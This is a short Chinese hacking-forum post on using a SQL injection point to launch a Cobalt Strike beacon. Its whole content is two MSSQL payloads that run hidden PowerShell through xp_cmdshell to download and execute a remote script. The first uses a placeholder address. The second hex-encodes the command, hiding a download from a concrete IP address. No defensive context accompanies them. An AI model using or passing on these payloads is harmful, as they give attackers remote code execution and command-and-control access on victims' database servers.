sql注入点执行powshell进行cobalstrike上线-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

sql注入点执行powshell进行cobalstrike上线

[复制链接]
发表于 2023-4-19 22:44:35 | 显示全部楼层 |阅读模式
[Bash shell] 纯文本查看 复制代码
declare @a nvarchar(100)='powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(';
declare @b nvarchar(100)='http://xxx.xxx.xxx.xxx:2000/a';
declare @ab nvarchar(200)=concat(@a,0x27,@b,0x27,'))"');
exec master..xp_cmdshell @ab;--


另一种:
[Bash shell] 纯文本查看 复制代码
declare @a nvarchar(300) = concat(0x706f7765727368656c6c2e657865202d6e6f70202d772068696464656e202d6320224945582028286e65772d6f626a656374206e65742e776562636c69656e74292e646f776e6c6f6164737472696e672827687474703a2f2f3231312e3134392e3235352e3139363a323030302f6127292922,0x20);
exec master..xp_cmdshell @a;--





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表